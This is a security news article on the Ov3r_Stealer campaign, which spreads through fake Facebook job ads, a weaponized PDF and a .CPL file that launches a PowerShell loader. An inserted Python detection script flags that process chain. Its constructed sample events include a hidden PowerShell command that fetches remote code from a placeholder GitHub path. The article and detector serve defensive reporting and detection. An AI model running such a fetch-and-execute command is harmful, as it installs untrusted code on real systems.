February 6, 2024 | Social Engineering / Malvertising
Threat actors are leveraging fake job postings on Facebook as a lure to trick potential targets into installing a new Windows-based stealer malware codenamed Ov3r_Stealer.
“This malware is designed to steal credentials and crypto wallets and send them to a Telegram channel that the threat actor monitors,” Trustwave SpiderLabs said in a report shared with The Hacker News.
Ov3r_Stealer is capable of extracting information based on IP addresses, hardware information, passwords, cookies, credit card information, autofills, browser extensions, cryptocurrency wallets, Microsoft Office documents, and a list of antivirus products installed on the compromised host.
While the exact end goal of the campaign is unknown, it is likely that the stolen information will be offered for sale to other threat actors. Another possibility is that Ov3r_Stealer will be updated over time to act as a QakBot-like loader for additional payloads, including ransomware.
The starting point of the attack is a weaponized PDF file that pretends to be a file hosted on OneDrive, prompting users to click on an “Access Document” button embedded in it.
Trustwave said it identified the PDF file that was shared on a fake Facebook account impersonating Amazon CEO Andy Jassy, as well as through Facebook ads for digital advertising jobs.
Users who end up clicking the button are presented with an Internet shortcut (.URL) file that masquerades as a DocuSign document hosted on Discord’s content delivery network (CDN). The shortcut file then acts as a conduit to deliver a control panel item (.CPL) file, which is then executed using the Windows Control Panel process binary (“control.exe”).
Executing the CPL file leads to the retrieval of a PowerShell loader (“DATA1.txt”) from a GitHub repository to eventually launch Ov3r_Stealer.
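A defender's detection check for the control.exe / .CPL / PowerShell hop described above, as an added example that is not taken from Trustwave's report: it parses constructed process-creation events and flags any PowerShell process whose ancestry includes control.exe handed a .cpl from outside C:\Windows. The log format, the rundll32.exe intermediate hop, the file names and the GitHub URL are assumptions, not values from the page.

```python
import re

# Constructed sample process-creation events (not real telemetry), reduced to the
# fields a Sysmon Event ID 1 record carries: pid, parent pid, image, command line.
SAMPLE_EVENTS = r'''
pid=4001 ppid=1200 image=C:\Windows\explorer.exe cmdline="explorer.exe"
pid=4010 ppid=4001 image=C:\Windows\System32\control.exe cmdline="control.exe C:\Users\bob\Downloads\DocuSign.cpl"
pid=4020 ppid=4010 image=C:\Windows\System32\rundll32.exe cmdline="rundll32.exe shell32.dll,Control_RunDLL C:\Users\bob\Downloads\DocuSign.cpl"
pid=4030 ppid=4020 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -w hidden -c (iwr https://raw.githubusercontent.com/EXAMPLE/DATA1.txt).Content"
pid=5000 ppid=4001 image=C:\Windows\System32\control.exe cmdline="control.exe timedate.cpl"
pid=5010 ppid=4001 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -File C:\Scripts\inventory.ps1"
'''

EVENT_RE = re.compile(r'pid=(\d+) ppid=(\d+) image=(\S+) cmdline="(.*)"')
# A legitimate applet lives under C:\Windows; a .cpl handed to control.exe from
# a user-writable path (Downloads, Temp, a browser cache) is the lure's delivery step.
CPL_RE = re.compile(r'(?i)\b([a-z]:\\[^"\s]+\.cpl)\b')
TRUSTED_DIR_RE = re.compile(r'(?i)^c:\\windows\\')

def parse_events(text):
    """Map pid -> (ppid, image, cmdline) from the key=value log format."""
    procs = {}
    for line in text.strip().splitlines():
        m = EVENT_RE.match(line)
        if m:
            procs[int(m.group(1))] = (int(m.group(2)), m.group(3), m.group(4))
    return procs

def untrusted_cpl(cmdline):
    """Return the .cpl path if the command line loads one from outside C:\\Windows."""
    m = CPL_RE.search(cmdline)
    return m.group(1) if m and not TRUSTED_DIR_RE.match(m.group(1)) else None

def find_cpl_to_powershell(procs, max_depth=5):
    """For each powershell.exe, walk up its ancestry (control.exe may go through
    rundll32.exe first) and report (powershell_pid, control_pid, cpl_path)
    when a control.exe ancestor loaded an untrusted .cpl."""
    hits = []
    for pid, (ppid, image, _) in procs.items():
        if not image.lower().endswith('\\powershell.exe'):
            continue
        cur, depth = ppid, 0
        while cur in procs and depth < max_depth:
            p_ppid, p_image, p_cmd = procs[cur]
            if p_image.lower().endswith('\\control.exe'):
                cpl = untrusted_cpl(p_cmd)
                if cpl:
                    hits.append((pid, cur, cpl))
                break
            cur, depth = p_ppid, depth + 1
    return hits
```

Running `find_cpl_to_powershell(parse_events(SAMPLE_EVENTS))` on the constructed events flags only the PowerShell descended from the Downloads .cpl, while the built-in timedate.cpl applet and the scheduled inventory script produce no hit.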
It is worth noting at this stage that Trend Micro recently revealed that threat actors used a nearly identical infection chain to launch another stealer called Phemedrone Stealer by exploiting the Microsoft Windows Defender SmartScreen bypass flaw (CVE-2023-36025, CVSS score: 8.8).
The similarities extend to the GitHub repository used (nateeintanan2527) and the fact that Ov3r_Stealer shares code-level overlaps with Phemedrone.
“This malware has recently been reported and it is possible that Phemedrone has been repurposed and renamed Ov3r_Stealer,” Trustwave said. “The main difference between the two is that Phemedrone is written in C#.”
To further solidify the connections between the two malware stealers, the threat actor has been observed sharing news reports published about the Phemedrone stealer on its Telegram channels in an effort to generate “street cred” for its malware-as-a-service (MaaS) business.
“My custom stealer is on the news, showing how elusive it is, I’m its developer so I’m very happy now,” said the threat actor, who goes by the online alias Liu Kong, while expressing frustration that threat hunters managed to “reverse the entire exploit chain” despite everything being “in memory.”
The findings come as Hudson Rock revealed that threat actors are advertising their access to the law enforcement request portals of major organizations such as Binance, Google, Meta and TikTok, using credentials obtained from information-stealing infections.
They also follow the emergence of a category of infections called CrackedCantil that leverage pirated software as an initial access vector to download loaders such as PrivateLoader and SmokeLoader, which subsequently act as a delivery mechanism for information stealers, cryptocurrency miners, proxy botnets, and ransomware.